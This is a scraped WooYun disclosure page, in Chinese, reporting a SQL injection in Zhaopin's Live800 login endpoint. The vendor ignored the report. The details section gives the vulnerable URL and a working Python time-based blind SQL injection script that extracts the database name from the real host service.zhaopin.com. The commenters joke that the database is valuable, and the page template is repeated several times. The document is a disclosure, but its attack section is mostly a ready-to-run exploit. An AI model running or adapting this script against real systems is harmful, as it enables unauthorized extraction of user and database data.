智联招聘某站sql注入漏洞附验证脚本 | wooyun-2016-0171611| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0171611

漏洞标题：智联招聘某站sql注入漏洞附验证脚本

漏洞作者： whynot

提交时间：2016-01-21 13:19

修复时间：2016-01-22 18:56

公开时间：2016-01-22 18:56

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2016-01-21：细节已通知厂商并且等待厂商处理中
2016-01-22：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

智联招聘某站sql注入漏洞附验证脚本

详细说明：

service.zhaopin.com/live800/loginAction.jsp?companyLoginName=1&loginName=a111&password=111
live800的漏洞
user

database

#encoding=utf-8
import httplib
import time
import string
import sys
import random
import urllib
headers = {}
payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.'
print '[%s] Start to retrive MySQL User:' % time.strftime('%H:%M:%S', time.localtime())
user = ''
for i in range(1, 21):
    for payload in payloads:
        try:
            s = "ascii(mid(lower(database()),%s,1))=%s" % (i, ord(payload))
            s = "aaa'XOR(if(%s,sleep(3),0))OR'bbb" % s
            conn = httplib.HTTPConnection('service.zhaopin.com', timeout=3)
            conn.request(method='GET',url="/live800/loginAction.jsp?companyLoginName=1%s&loginName=a111&password=111" % urllib.quote(s))
            conn.getresponse()
            conn.close()
            print '.',
        except Exception,e:
            print e
            user += payload
            print '\n[in progress]', user,
            time.sleep(3.0)
            break
print '\n[Done] MySQL user is %s' % user

这个上过首页啊

漏洞证明：

修复方案：

升级

版权声明：转载请注明来源 whynot@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2016-01-22 18:56

厂商回复：

感谢whynot对智联招聘安全的关注，经测试漏洞不能复现，故选择忽略。

漏洞评价：

评价

2016-01-21 13:20 | 牛小帅 ( 普通白帽子 | Rank:971 漏洞数:226 | 1.乌云最帅的男人 ...)

666
2016-01-21 13:20 | whynot ( 普通白帽子 | Rank:553 漏洞数:100 | 为你解冻冰河为你放弃世界有何不可)

@牛小帅秒回复
2016-01-21 13:41 | _Thorns ( 普通白帽子 | Rank:1656 漏洞数:246 | WooYun is the Bigest gay place. 网络工...)

哈哈哈，脚本牛
2016-01-21 13:46 | whynot ( 普通白帽子 | Rank:553 漏洞数:100 | 为你解冻冰河为你放弃世界有何不可)

@_Thorns 扯淡给你学的拿着lijiejie的改了改哈哈
2016-01-21 14:25 | oneplusone ( 实习白帽子 | Rank:37 漏洞数:14 | 三十功名尘与土，八千里路云和月。莫等闲、...)

楼上真相了
2016-01-21 15:10 | LoveSnow ( 路人 | Rank:27 漏洞数:8 | 以正和，以奇胜！)

@whynot 这是要发啊
2016-01-21 15:19 | whynot ( 普通白帽子 | Rank:553 漏洞数:100 | 为你解冻冰河为你放弃世界有何不可)

@LoveSnow 发是什么意思?
2016-01-21 15:56 | LoveSnow ( 路人 | Rank:27 漏洞数:8 | 以正和，以奇胜！)

@whynot 这数据库值钱啊哈哈开玩笑哈
2016-01-25 13:51 | lull ( 实习白帽子 | Rank:35 漏洞数:4 | lullaby)

笑尿...

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0171611

漏洞标题：智联招聘某站sql注入漏洞附验证脚本

相关厂商：智联招聘

漏洞作者： whynot

提交时间：2016-01-21 13:19

修复时间：2016-01-22 18:56

公开时间：2016-01-22 18:56

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 whynot@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0171611

漏洞标题：智联招聘某站sql注入漏洞附验证脚本

相关厂商：智联招聘

漏洞作者： whynot

提交时间：2016-01-21 13:19

修复时间：2016-01-22 18:56

公开时间：2016-01-22 18:56

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2016-0171611"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 whynot@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：